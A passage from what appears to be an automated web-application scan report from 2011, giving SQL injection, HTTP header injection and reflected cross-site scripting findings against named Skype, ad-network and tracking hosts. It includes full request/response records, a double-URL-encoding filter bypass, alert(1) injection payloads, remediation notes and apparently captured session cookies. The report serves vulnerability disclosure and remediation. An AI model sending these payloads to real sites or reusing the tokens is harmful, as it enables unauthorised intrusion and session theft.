<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.48. http://community.skype.com/t5/util/componentrenderpage/component-id/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/util/componentrenderpage/component-id/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/util/componentrenderpage/component-id/?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:47:01 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 35883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
<div class="exception-page-message RuntimeException lia-component-content" class="exception-page-message RuntimeException">
...[SNIP]...
<li>
           Sorry, your request failed. A notification has been sent to the development team for investigation.<p>
...[SNIP]...

Request 2

GET /t5/util/componentrenderpage/component-id/?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:47:02 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.49. http://search2.skype.com/search/search.cgi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://search2.skype.com
Path:   /search/search.cgi

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /search/search.cgi?query=xss&collection=skype-en&1'=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: search2.skype.com
Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:17:41 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39998

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<!-- Meta -->
<meta cha
...[SNIP]...
<!-- Padre error status: 2 -->
...[SNIP]...

Request 2

GET /search/search.cgi?query=xss&collection=skype-en&1''=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: search2.skype.com
Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:17:43 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40007

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<!-- Meta -->
<meta cha
...[SNIP]...

2. HTTP header injection  previous  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://142.xg4ken.com/media/redir.php [k_clickid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://142.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the k_clickid request parameter is copied into the Location response header. The payload 27af3%0d%0a1445eb0004d was submitted in the k_clickid parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=27af3%0d%0a1445eb0004d&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinflexion HTTP/1.1
Host: 142.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:18:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:45 GMT; path=/; domain=.xg4ken.com
Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=27af3
1445eb0004d

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.2. http://142.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://142.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 28e5e%0d%0ae9747ada840 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=AMS|_kenshoo_clickid_&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinfle/28e5e%0d%0ae9747ada840xion HTTP/1.1
Host: 142.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:18:46 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:46 GMT; path=/; domain=.xg4ken.com
Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=infle/28e5e
e9747ada840
xion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


3. Cross-site scripting (reflected)  previous  next
There are 135 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75be5"><script>alert(1)</script>698f01d1a56 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=75be5"><script>alert(1)</script>698f01d1a56&r=1662255836 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=13151898879098e79e1e7e81d&rand=1315189887909&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_text&ifr=1&v=1.0&csync=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=6981940571811189480

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 02:30:53 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=6981940571811189480&rnd=2866977535605027834&fpid=75be5"><script>alert(1)</script>698f01d1a56&nu=n&t=&sp=n&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.2. http://afe.specificclick.net/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85163'-alert(1)-'d48efb024f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?l=19240&sz=728x90&wr=j&t=j&u=&r=&rnd=615455&pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&85163'-alert(1)-'d48efb024f=1 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76ca32722d97e66b629c0f8c67ac; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:30:58 GMT
Content-Length: 1285

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223059;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8y
...[SNIP]...
53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&85163'-alert(1)-'d48efb024f=1" width="728" height="90" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

3.3. http://afe.specificclick.net/ [pasmc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The value of the pasmc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ced'-alert(1)-'3b0145e93ed was submitted in the pasmc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?l=19240&sz=728x90&wr=j&t=j&u=&r=&rnd=615455&pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3Dc8ced'-alert(1)-'3b0145e93ed HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76ca26641b15176f9bf898619800; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:30:58 GMT
Content-Length: 1283

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223058;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8y
...[SNIP]...
y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3Dc8ced'-alert(1)-'3b0145e93ed" width="728" height="90" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

3.4. http://afe.specificclick.net/serve/v=5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 508d9'-alert(1)-'a737bccdbe7 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D508d9'-alert(1)-'a737bccdbe7 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76d09f72564970422799112b38d3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:24 GMT
Vary: Accept-Encoding
Content-Length: 2743
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D508d9'-alert(1)-'a737bccdbe7http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189885" target="_blank">
...[SNIP]...

3.5. http://afe.specificclick.net/serve/v=5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e718"><script>alert(1)</script>08a95dd801e was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D7e718"><script>alert(1)</script>08a95dd801e HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:21 GMT
Vary: Accept-Encoding
Content-Length: 2788
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D7e718"><script>alert(1)</script>08a95dd801e" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
...[SNIP]...

3.6. http://afe.specificclick.net/serve/v=5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

